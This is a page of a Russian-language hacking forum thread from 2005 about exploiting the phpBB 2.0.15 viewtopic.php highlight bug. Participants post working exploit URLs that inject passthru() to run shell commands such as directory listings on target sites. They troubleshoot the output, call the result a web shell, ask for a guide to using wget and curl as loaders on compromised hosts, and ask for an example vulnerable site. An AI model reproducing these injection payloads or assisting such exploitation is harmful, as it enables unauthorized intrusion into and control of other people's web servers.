HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Уязвимости форумов phpbb 2.0.15
   
Ответ
Страница 6 из 11 « Первая < 2 3 4 5 6 7 8 9 10 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.07.2005, 21:45
Felix
Новичок
Регистрация: 10.06.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от Rebz  
Azazel, а ты права доступа взглянул??) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..

Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!

Походу уязвим т.к когда я начинаю задавать какие либо параметры, от форума остается только шапка, но ничего не выполняется и следовательно не выводиться тоже как быть, мот кто встречал ??
 
Ответить с цитированием

  #2  
Старый 07.07.2005, 22:06
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию
Я вот пишу: _http://saitik/forum/viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET _VARS[cmd]).%27&cmd=ls ../../;ls%20-la Он не показывает права на папки, что не так? Да и где-то читал, что нада посмореть качалку, которая стоит на сайте, как и где это зделать?
 
Ответить с цитированием

  #3  
Старый 07.07.2005, 22:30
nopmoc
Новичок
Регистрация: 06.05.2005
Сообщений: 11
Провел на форуме:
7371

Репутация: 0
По умолчанию
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
 
Ответить с цитированием

  #4  
Старый 08.07.2005, 00:09
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию
Цитата:
Сообщение от nopmoc  
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
А не прокатывает =( Выдает вот так:
../../:
cgi-bin
cgi-bin-dist
data
data-dist
error
error-dist
icons
icons-dist
И всё... ну что ещё мона зделать...
 
Ответить с цитированием

  #5  
Старый 07.07.2005, 23:40
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
>>Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
=))))))))) лооооол это веб шел...набивай адрес в урл
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #6  
Старый 08.07.2005, 11:59
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #7  
Старый 08.07.2005, 15:39
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию
Цитата:
Сообщение от m0nzt3r  
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET _VARS[cmd]).%27&cmd=ls%20../../%20-la. Т.е. выходим на 2 каталога выше, и сморим права. Не отображается тока папки. Пишем ls%20../../%20;la, тоже.... ls%20../../%20;-la тоже...
Чё делать то может на какой сайтик дадите пример?
 
Ответить с цитированием

  #8  
Старый 09.07.2005, 00:11
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
а ты попробуй просто ls -la написать )) может так получится?
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #9  
Старый 16.07.2005, 05:30
JayTi
Новичок
Регистрация: 14.07.2005
Сообщений: 2
Провел на форуме:
544

Репутация: 0
Отправить сообщение для JayTi с помощью ICQ
По умолчанию
Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
 
Ответить с цитированием

  #10  
Старый 16.07.2005, 05:56
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Они должны стоят. Та качалка(wget) или другая (curl)!
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием
Ответ
Страница 6 из 11 « Первая < 2 3 4 5 6 7 8 9 10 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Уязвимости CMS / форумов 11 01.02.2007 12:21
Использование уязвимости в phpbb 2.0.15. Вопросы.. -artik- Уязвимости CMS / форумов 8 28.08.2005 20:00
phpBB < 2.0.15, BBCODE URL в phpBB karapuz Уязвимости CMS / форумов 21 17.06.2005 06:11
Вопрос про статью на античате о Уязвимости форумов IPB aX0en Уязвимости CMS / форумов 2 16.12.2004 20:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ